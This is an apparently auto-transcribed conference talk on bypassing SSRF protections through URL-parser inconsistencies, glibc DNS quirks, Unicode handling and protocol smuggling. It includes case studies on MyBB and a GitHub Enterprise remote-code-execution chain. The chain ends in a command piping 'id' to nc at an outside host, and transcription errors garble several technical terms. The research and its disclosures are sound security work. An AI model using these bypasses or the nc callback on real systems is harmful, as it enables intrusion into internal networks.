Thanks for coming. Okay, to be honest, I really want to listen to the talk by Stephen Acer at 5 p.m. So can we finish the talk at 5? Just kidding.
Ask you many questions. Okay.
But if you want to leave at 5, I can understand. This talk will be more about the research on web security. SSRF is an attack technique on web application. The first concept of SSRF was found 10 years ago. Since then, many exploitations and mitigations were developed. In this talk, I will show you some of my findings. These findings are not only able to bypass existing SSRF protections, but also lead to critical remote code executions. Also, we will give case studies in real web application and a demo in GitHub Enterprise. Okay, let's go. Hi, again, I'm Orange from Taiwan. Taiwan is a country in Asia, and we speak Mandarin Chinese. As you can see, my English is not good, but I will try my best to give this talk. Thank you for bearing with me. I have just got my MS degree and worked in a security startup. I can say that DevCore is the most professional red team in Taiwan. I'm a vulnerability researcher in DevCore. I can do reversing stuff, binary exploitation, but my favorite is still web security. I'm also a member of ChangeRoot and HackCon. ChangeRoot is the earliest hacker group in my country. In addition, we hold HitCon, the largest hacker conference in Taiwan. By the way, HitCon 2017 will take place, tomorrow. I think no one can join this year. Okay, it's fine. Here is a brief introduction of myself. I'm a speaker, CTF player, and a bug bounty hunter. In web security, I love server-side vulnerability more than client-side. To take control of a server is more fun for me. So, I love remote code execution in particular. And you can see what vendors I report RCE to: Facebook, GitHub, Apple, Uber, and so on. Someone told me always put cats in your slides so that you can catch all the eyes and never fail your talk. Nobody has cats, right? This is our agenda today. Our goal is to make SSRF great again. First, I will introduce SSRF and start with some quick fun examples. Next, I will talk about my findings in both an attack surface on SSRF bypass and a new attack vector in protocol smuggling that enhances the existing SSRF. By combining these, we can achieve more advanced exploitations or compromise the server. Of course, we will have case studies and demo. Okay, what is SSRF? I know this is a hacker conference, so I don't need to talk about lots of trivial introductions. I suppose you all know what SSRF is. SSRF, in a word, it can bypass the firewall and touch your intranet. So the attack surface is dependent on how big your intranet is. The larger your enterprise is, the more robust SSRF will be. For example, in a big company, there are lots of Struts 2, Redis, Elastic you can pound by SSRF. Next, protocol smuggling in SSRF. It makes SSRF more powerful. There are several ways to smuggle protocols in a SSRF, and each way has its limitation. So, what protocol is good to smuggle? I have a list here, and you can check. Okay, our introduction part is over. Short, right? Before we start our topic, I want to make a survey. How many people use Python? Please raise your hand. Wow, cool. I want to ask you a question. If you want to access the web with Python, which library do you prefer? I think the most Python guys use request-asc, URL-lib, or URL-lib2. Let's start with a fun example. Think about this URL. The red square is the space. So, which address Python is going to access? You have 5 seconds to put the answer in your mind. 1, 2, 3, 4, 5. Okay. Here is the answer. Actually, even Python's built-in libraries treat the same URL differently. URL-lib access the blue part, and the URL-lib2 access the orange part. The green part is request-asc. It sounds crazy. Python is really, really hard. I don't understand Python. Another shortcut, it is easy to understand if there is a SSRF injection in HTTP, and we can smuggle other protocols. But as you can see, for the security concern, most of SNTP servers block the HTTP connection. If server finds the HTTP pattern, such as get/ or post/ in the incoming request, the server will cut off the connection. So SNTP has HTTP protocol, and it seems unexploitable. Somebody might say, you can use Gopher. We are not going to talk about Gopher today. Gopher is good, but what if there is no Gopher support? Gopher is too easy to block, and not all programming language support Gopher. But in a SSRF, the HTTP always exists. So this talk we focus on the attack scenario on the HTTP and HTTPS. Let's smuggle SNTP protocol over HTTPS. HTTPS is a secured protocol, so the payload will be encrypted. So how? Let's think about a question. What won't be encrypted in a SSL handshake? Okay, the answer is SNI, Server Name Indication. We can send a HTTPS request on port 25 to bypass the limitation. Smuggle SNTP over SSL SNI, I think no one mentioned this before. During the SSL, the hello messenger will be the handshake that exchanges the metadata between the server and the client. And there is a SNI extension which specify the remote hostname in this messenger. So, what if we can disrupt the hostname? Yes, the yellow square. This space makes it possible to embed malicious payload in the domain name. So, you can see with the space, we can now inject new lines and data in the hostname. Okay, why this works? we used a trick in Linux glibc, and we will introduce later. The data separated by new lines is SMTP protocol with Smuggling. Our command simply requires the SMTP server to send a mail. This is the request and the response in plain text. You can see there is no HTTP pattern such as get / or post / here. And the server recognized our payload as a valid command. So we exploit the unexploitable successfully. Okay, these two examples are interesting, right? Okay, let's go to our main content. Yeah, make SSRF great again. Today, we prepared 4 sections to make SSRF great again. First part, URL parsing issues. This is all about the inconsistency between the URL parser and the URL requester. It is common to fix a SSRF by validating the URL. But validating a URL is a hard work. Why? The spec of URL is defined in RFC 3986, but only spec without implementation guidelines. HITBGSEC is a community trying to define a modern implementation based on RFC. But in fact, programming language still prefer their own implementation mode. So there are lots of mistakes on URL parsers. How RFC define the URL? This is the URL components defined in RFC 3986. There are totally 5 parts: string, authority, path, query, and fragments. And this is what we will cover today: the string, authority, and path. For the string, we only care about a tag scenario on the HTTP and HTTPS. For the authority and path, they are too complex to understand, so we will take a look later. Finally, as the query and fragment, I don't care. This is the big picture of problems we will mention today. We classify the URL parsing issues into 3 types: poll injection, host injection, and path injection. So does protocol smuggling. Smuggling on path, smuggling on host, and smuggling on SMI. Consider the following code in PHP. The code simply fetches the user provided URL. In order to prevent SSRF, developers use the function parsURL to check whether the host and poll are valid or not. So, if you provide 127.0.0.1 and poll 81, you will not pass the check. But how about this URL? Everyone knows colon is the separate between the host and the poll. RFC defined the spec but didn't say how to implement. So, will the colon be interpreted from the front or the back? It is interesting. For this URL, the PHP function parsURL recognizes 80 as poll number. But actually, PHP read file fetches the poll number 11211. Both parsURL and read file are the built-in functions in PHP. but their behaviors are very distinct. So we can use this inconsistency to bypass the check. And how about this URL? google.com @avo.com. This is another interesting case. Parse URL will recognize google.com as hostname, but read file fetches avo.com. This URL perfectly bypasses all the restrictions, but are you curious about which behaviors is the right one? Okay, let's make a little survey. If you think google.com is the right one, please raise your hand. No one? Okay. I think the domain avo.com already told you the answer. Several programming languages suffered from this issue, like PHP, Java, Perl, and Python. According to the IFC, the authority part is preceded by a double slash and is terminated by the next slash, question mark, or number sign. So the appropriate authority part is google.com. Okay, if you don't like PHP, let's explore curl. Curl is a world-famous library, and there are lots of language bindings. Think about how curl interpret this URL. foo@avo.com, port 80 @google.com. Most parsers recognize google.com as a valid hostname, but curl fetches avo.com. The inconsistency between the parser and curl will also lead to security problems. I think we all agree that curl is a world-famous library with lots of language bindings. Therefore, if an application uses its parsing library to track the URL, but fetch the resource by curl, it might be vulnerable. This is very common in PHP because PHP built-in HTTP library sucks. After I find this problem, I quickly report to the curl security team, and their reply is in no time. But while checking the patch, I find we can simply bypass the patch by an additional space. This is not the fault of curl. This also uses a feature in Linux glibc, and we will talk about later. However, I think curl can be more strict, so I report again. But this time, curl team replied, curl doesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URL and assume that you pass correct input. Curl thinks this is programmers' problems, so this won't be fixed. But previous patch still applied on curl 7.54. The next attack vector is about the Unicode failure on NodeJS. Look at the following code. In order to prevent directory traversal, the code checked there is no ... in the path. So you can't access the file outside the sandbox directory. Okay, the question is, if there is a password file on the web root, how to access the file? Does anyone have an idea? Okay. The answer is using the Unicode symbol full with N. This URL actually accesses the file password on the web root. Okay, let's explain why. The JavaScript's internal process the Unicode string as encoding UCS2. So the Unicode symbol N will be represented in FF2E. And the tricky thing is the buffer string in HTTP module will fold the byte, and the FF will be stripped. And the remaining part is 2E, the ASCII of dot. The server will identify the // as the parent directory. So we can download the password file on the web root from remote server. The double full with N is the new // in NodeJS HTTP module. What the hell? I have nothing to say. This technique can be also applied on protocol smuggling. Originally, HTTP module prevents users from SSRF injection. The HTTP module will encode the new line as percent encoding. So, if we inject new lines in the path, our smuggling will fail. But we can break the protection by Unicode symbol FF0D and FF0A, the full with dash and the full with asterisk. The HTTP module cannot locate the new line in the path, but output will fold the byte and strip the FF. So, our protocol smuggling reproduces again. Next section is about the features on Linux glibc. First, this is a weird feature in NSS function getHostByName. By looking the source of glibc, there is a command here. Convert an ASCII string into an encoded domain name as per IFC 1035. But what is IFC 1035? The IFC 1035 describes the detail of the domain system and protocol. But surprise is the domain system supports decimal conversion in getHostByName. You can see the C program. The result of OR\097 NGE.tw is equal to the result of orange.tw. I roughly grabbed the Linux main page, but I didn't find anything related to this weird feature. I think this may be useful when bypassing some blacklist protections. And the source code showed that getHostByName will remove the backslash that is not followed by digit. This is also a good way to obfuscate your domain name with lots of backslashes. You can see I print out the host to show that the escaping process is done by getHostByName. The next feature is about the Linux getAddressInfo. GetAddressInfo will strip traveling rubbish followed by a valid IP format and the white space. You can see the C program. The domain 127.0.0.1 space FOO is valid and returned 127.0.0.1. GetAddressInfo is a very fundamental function in Linux. So, for example, the function getHostByName in Python socket module relied on Linux getAddressInfo. So, the CRF FOO in the domain name will be removed. This makes it possible to do more complex attacks based on the polluted domain name. Okay, let's talk about how to exploit NSS features on URL parsers. URL parsers might recognize all the authority part as hostname, but HTTP requesters still fetch 127.0.0.1. The %2509 is a special one and need more explanations. Why double encoding works? After digging the source, we find that libraries such as Perl decode the URL twice. So these patterns are useful for breaking some subdomain checks. Next, exploit NSS features on protocol smuggling. Also, first, why this works? This is because that HTTP protocol 1.1 required a host header. And most of libraries embed hostname into HTTP request. So the idea is, if we can inject new line in the hostname, we have the ability to smuggle protocols in HTTP. For example, the data with new lines in the hostname will be recognized as a valid Redis command. You can see we smuggle the set of command over the HTTP protocol. By the way, the set of is a nice command that you can make outbound traffic. This is useful when you are facing some blind SSRF. SMI injection is also the same idea. During the SSL, the SMI extension will embed hostname in the hello messenger. So, if we inject new lines in the hostname, we can find out the command in the encrypted messenger. Let's break the patch of Python CVE 2016-5699. It's a CRF injection in the function put header of module HTTP lib. Python uses a regular expression to ensure there is no new line in the header. Otherwise, it will raise an error. But Python makes an exception of the tab and space followed by the new line. So, we can break the patch by a leading space. You can see with the space, the URL lib and URL lib2 are vulnerable again. But this brings out a new problem. There is one more leading space in our payload. Does protocol smuggling work this way? The answer is yes, thanks to the Redis and main cache. As you can see, the set of command start with a leading space, but the server still replied OK. Redis and main cache will strip the leading space, so our exploit works again. Next attack vector is about the IDNA standard. IDNA defines the standard of Unicode in domain name system. There are two primary versions of IDNA, 2003 and 2008. But IDNA 2008 is too strict. So most of the parsers follow the IDNA 2003 with UTS 46 transition. The IDNA supports lots of weird Unicode transitions. For example, the circled alphabet will recognize as a valid letter in domain name system. And the Unicode 200D 0 with joiner will be removed in IDNA 2003 with UTS 46 transition. So, if the parser and the request adopt different IDNA standard, it might be a security concern. A very fun example is the Latin letter small sharp s. This is a JavaScript example that you can run on your browsers. You can see the symbol in lowercase is the same as itself, but in uppercase, it becomes the double capital S. And the redirection in browsers will also go to WordPress.com. This is useful for breaking some blacklist, and we will give you a real case study later. Okay, case studies. No typo. Let's study some real-world cases. WordPress is a very famous web application, and it paid lots of attentions on SSRF. But we still find 3 different ways to bypass the protections. Bug has been reported several months ago, but still unpatched. For the responsible disclosure process, I will use MyBB as my case study instead. However, these techniques are very general, so I think you can use them in anywhere. This table shows which components WordPress, vBulletin, and MyBB will use to treat a URL. The main concept of the bypass is finding different behaviors among the parser, DMS tracker, and the requesters. If you find one, then you have the ability to bypass the restrictions. This is the source. This is the source of MyBB. The first bypass is not a new trick. It is type of track to time of use problem. MyBB uses parse URL to check whether the hostname, skin, and poll are valid or not. And also use get host by name to resolve the domain. Ensure that the address is not in blacklist. If the URL passes all the checks, MyBB will fetch the resource by curl. The problem is the state of track and the state of use can be different. So we set up a DNS server and lead the first query to a non-blacklist address, such as 1.2.3.4. After we pass the track, MyBB will fetch the URL and query the domain again. At the moment, we change the DNS record to 127.0.0.1. The state in check is 1.2.3.4, but the state in use is 127.0.0.1, so that we can bypass the protection. The next bypass is about the support of IDNA standard. Curl is a very intelligent library, which can automatically convert the global domain name to an IP address. But PHP get host by name can't. This inconsistency also leads to SSRF bypass. You can see, for the URL, get host by name will return false and pass the track. But curl still fetches 127.0.0.1. The last bypass is the inconsistency between the parser and the requester. We mentioned several URL parsing issues before. By using these issues, we can bypass all the restrictions. For the number sign bug, the parse URL recognizes google.com as hostname. But curl fetches 127.0.0.1. This is handy but has been fixed in PHP 7.0.13. If you don't like PHP, you can still exploit the bug in curl. And the result is the same. This bug is also fixed in curl 7.54. But most of the patches didn't keep up. For example, the lib curl in the latest version of Ubuntu is still 7.52.1. So I think most systems are still on the thread. Or you can use the space technique we mentioned before. And this issue, curl won't fix. Okay, let's see the last case study, GitHub Enterprise. GitHub Enterprise is a local version of GitHub that you can deploy a whole GitHub service in your private network. Most of the code are written in Ruby on Rails and obfuscated. The codebase of GitHub Enterprise seems to be same as github.com. And there is an environment variable that you can switch the mode from Enterprise version to the .com version. So, if you want to study the security on GitHub, I highly recommend GitHub Enterprise to you. In this case, I will show you a beautiful exploit chain that turned 4 vulnerabilities into a critical remote code execution. It also won the best report in GitHub 3rd Bug Bounty anniversary. While playing GitHub Enterprise, I noticed that is an interesting feature called webhook. Webhook can define a custom HTTP callback when specific Git command occurs. GitHub uses RubyGen Faraday to fetch external resource and prevents users from SSRF by Gen Faraday restrict IP addresses. The Gen seems to be just a simple blacklist and can be bypassed by a 0. In Linux, the 0 stands for localhost. So, we got a SSRF now. However, we still can't do anything. Why? There are several limitations in this SSRF, such as this SSRF only allows the string HTTP and HTTPS, and we can't change the string by the 302 redirection. This is also a post-based SSRF, and we can't even control the header or the post data. The most important thing is there is no CRF injection in this SSRF. Okay, we have a SSRF, but with lots of limitations. My next idea is there any service we can leverage? It is a bit work. There are several services inside, and each service based on different language implementation, like C, C++, Go, and Python. With a couple of days digging, I find there is a service called Graphite on port 8000. Graphite is a highly scalable and real-time graphing system. Of course, we find another SSRF here. The second SSRF is simple. Graphite just fetch the URL from the get parameter. So we have 2 SSRF now, and we can combine these 2 SSRF into a SSI execution chain. and we successfully switched a post-based SSRF into a get-based SSRF. The third bug is the CRF injection on Graphite. As you can see, the implementation of the second SSRF is Python HTTP lib. Earlier, we mentioned that HTTP lib suffered from CRF injection. So, with the CRF injection, we have the ability to smuggle protocols in this SSRF execution chain. However, the next problem is, what protocol did I choose to smuggle? I spent lots of time to find out what vulnerabilities can be triggered if I can control the Redis or main cache. While reviewing the source, I'm curious about why GitHub can store Ruby object in main cache. After some digging, I find GitHub used a Ruby gem to store the cache, and the cache was wrapped by Masha. This is a very good news. Everyone knows Masha is dangerous. So, our goal is very clear. We use our SSRF execution chain to store malicious Ruby object in main cache. The next time GitHub fetches the cache, the Ruby gem will deserialize the data automatically. And the result is we got a remote code execution. Here is the final payload. There are several parts. The red part is the first SSRF bypass in webhook. Combined with the blue part, the second SSRF. The yellow is the main cache protocol we smuggled. And the final dark blue part is our malicious Ruby object. In this case, we execute the command id pipe nc orange.tw port 12345. In this case, I wrote $12,500 from GitHub. I think this is a very practical case about the SSRF execution chain and protocol smuggling in the world. Okay, let's watch the demo video, Remote Code Execution on GitHub Enterprise. Okay, this is GitHub Enterprise, very similar to github.com, right? The version is 2.8.6. In order to add a webhook, we open our profile, repository, and settings. Click Hooks and Services. Add a webhook. Okay, here is the callback URL. We open our console. Okay, list the exploit file. And run the exploit. Here is our SSRF payload. We pass the payload to the GitHub Enterprise. Okay, when we submit the form, the SSRF execution chain will insert a malicious data to the main cache. Okay, we listen a port on 12345 and wait the command back. The final step is to trigger the deserialization. We can search a keyword to trigger the RCE. Okay, as you can see, we got a shell. Thank you. So, with the SSRF execution chain and the protocol smuggling over the main cache, we can execute arbitrary system command on remote server. What the? Oh, back. Okay. Mitigations. How to prevent such attacks in SSRF? From two aspects. For application layer, use the only IP to connect, and remember, don't reuse the URL that user provided. For network layer, use firewall or network policy to block internal traffics. There are also projects that designed to prevent you from SSRF attacks. SafeCurl by Finite and AdvertKit by Jordan Mail. Okay, summary. First, we introduce a new attack surface on SSRF bypass, including the issue on URL parsers and the inconsistency between the IDNA standards. Second, new attack vector on protocol smuggling. We showed that weird features on Linux are... I have no power. Okay, I think. Is the power okay? Okay, second. The Linux glibc and the Unicode failure on NodeJS. These issues can inject malicious payload in a valid HTTP request to bypass the firewall and touch your intranet. The last, we give case studies on such Python, MyBB, and GitHub. Oh, thanks for the following articles. They inspire me to do this research. And thanks to many people who helped me. This is the end of my presentation. If you have further questions, here is my contact information. orange@changelog.org. Or you can find me on Twitter. orange_AC61. Thanks for staying with me. Thanks.
Thank you. Thank you also for the many cat pictures.
Yeah.
And it really does work. Anyone have any questions from the floor?
I'm a little afraid of Q&A, but you still can ask questions to me.
Now, please ask Q&A. No questions? Oh, yes.
Hello. What do you think about this attack in ASP.NET?
Sorry, pardon. Can you slowly?
Okay. What do you think about this attack in ASP.NET?
.NET. Okay.
Yes.
Sorry, wait for me. Do you know on Windows, the .NET on Windows? The vulnerability on Windows, right?
On Windows.
Huh?
On Windows.
Yeah, on Windows. Yeah. I prepared some questions that the audience may ask. Maybe you hit my list. Does MSS features work on Windows? No. Yeah. So it doesn't work on .NET. Yes.
Thank you.
One more. Does MSS features work on Mac? It is interesting. Yeah. You can see the IFC 1035 support. Yeah, it works on Mac and Linux. But the space technique, it works on get host by name on Mac OS X, but not work on get host by name on Linux. That is very weird. Yeah. Maybe does I answer your question? Do I answer your question? Okay, thank you.
That's great. That's the most prepared Q&A session I've seen. Please, anyone, come up with another question that he may have predicted? No?
Any other questions?
How about we go through some of your answers for the questions you have? No? Well, all right. Orange will be around today, for the rest of today and tomorrow also. So if you have any questions, feel free to approach him. Really great, friendly guy, and clearly a great talk.
Okay,
thank you very much, Orange.